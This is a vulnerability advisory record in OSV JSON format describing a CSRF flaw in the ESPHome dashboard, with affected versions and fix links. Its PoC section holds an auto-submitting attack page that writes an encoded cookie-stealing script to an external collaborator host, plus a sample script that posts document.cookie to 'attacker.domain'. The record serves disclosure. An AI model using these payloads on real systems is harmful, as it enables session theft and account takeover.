{"id":"PYSEC-2026-1327","summary":"ESPHome vulnerable to Authentication bypass via Cross site request forgery","details":"### Summary\nAPI endpoints in dashboard component of ESPHome version 2023.12.9 (command line installation) are vulnerable to Cross-Site Request Forgery (CSRF) allowing remote attackers to carry out attacks against a logged user of the dashboard to perform operations on configuration files (create, edit, delete).\n\n### Details\nIt is possible for a malicious actor to create a specifically crafted web page that triggers a cross site request against ESPHome, this allows bypassing the authentication for API calls on the platform.\n\n### PoC\nAn example of malicious web page that abuses this vulnerability:\n\n\n\u003chtml\u003e\n  \u003cbody\u003e\n\t\u003cform action=\"http://localhost:6052/edit?configuration=poc.yaml\" id=\"#main\" method=\"POST\" enctype=\"text/plain\" onsubmit=\"setTimeout(function () { window.location.reload(); }, 10)\"\u003e\n  \t\u003cinput type=\"hidden\" name=\"&lt;script&gt;&#13;&#10;fetch&#40;&apos;https&#58;&#47;&#47;907zv9yp9u3rjerkiakydpvcr3xulk99&#46;oastify&#46;com&#63;x\" value=\"y&apos;&#44;&#32;&#123;&#13;&#10;method&#58;&#32;&apos;POST&apos;&#44;&#13;&#10;mode&#58;&#32;&apos;no&#45;cors&apos;&#44;&#13;&#10;body&#58;document&#46;cookie&#13;&#10;&#125;&#41;&#59;&#13;&#10;&lt;&#47;script&gt;&#13;&#10;\" /\u003e\n\t\u003c/form\u003e\n\n\t\u003cscript\u003e\n  \tdocument.forms[0].submit();\n\t\u003c/script\u003e\n\n\t\u003cscript\u003e\n\t\u003c/script\u003e\n  \u003c/body\u003e\n\u003c/html\u003e\n\nIn which an attacker creates and weaponizes \"poc.yaml\" config file containing a cookie exfiltration script and forces the payload triggering visiting the vulnerable page.\n\n\nExample of such script:\n\u003cscript\u003e\nfetch('https://attacker.domain', {\nmethod: 'POST',\nmode: 'no-cors',\nbody:document.cookie\n});\n\u003c/script\u003e\n\n\n### Impact\nThis vulnerability allows bypassing authentication on API calls accessing configuration file operations on the behalf of a logged user. In order to trigger the vulnerability, the victim must visit a weaponized page.\n\nIn addition to this, it is possible to chain this vulnerability with GHSA-9p43-hj5j-96h5 (as seen in the PoC) to obtain a complete takeover of the user account.\n\n","aliases":["CVE-2024-29019","GHSA-5925-88xh-6h99"],"modified":"2026-07-07T17:46:44.621958958Z","published":"2026-07-07T11:45:36.076269Z","references":[{"type":"WEB","url":"https://github.com/esphome/esphome/security/advisories/GHSA-5925-88xh-6h99"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2024-29019"},{"type":"WEB","url":"https://github.com/esphome/esphome/pull/6396"},{"type":"WEB","url":"https://github.com/esphome/esphome/pull/6397"},{"type":"WEB","url":"https://github.com/esphome/esphome/commit/c56c40cb824e34ed2b89ba1cb8a3a5eb31459c74"},{"type":"ADVISORY","url":"https://github.com/advisories/GHSA-9p43-hj5j-96h5"},{"type":"PACKAGE","url":"https://github.com/esphome/esphome"},{"type":"WEB","url":"https://github.com/esphome/esphome/releases/tag/2024.3.0"},{"type":"PACKAGE","url":"https://pypi.org/project/esphome"},{"type":"ADVISORY","url":"https://github.com/advisories/GHSA-5925-88xh-6h99"}],"affected":[{"package":{"name":"esphome","ecosystem":"PyPI","purl":"pkg:pypi/esphome"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"2023.12.9"},{"fixed":"2024.3.0"}]}],"versions":["2023.12.9","2024.2.0","2024.2.0b1","2024.2.0b2","2024.2.0b3","2024.2.1","2024.2.2","2024.3.0b1","2024.3.0b2","2024.3.0b3","2024.3.0b4","2024.3.0b5"],"database_specific":{"source":"https://github.com/pypa/advisory-database/blob/main/vulns/esphome/PYSEC-2026-1327.yaml"}}],"schema_version":"1.7.5","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"}]}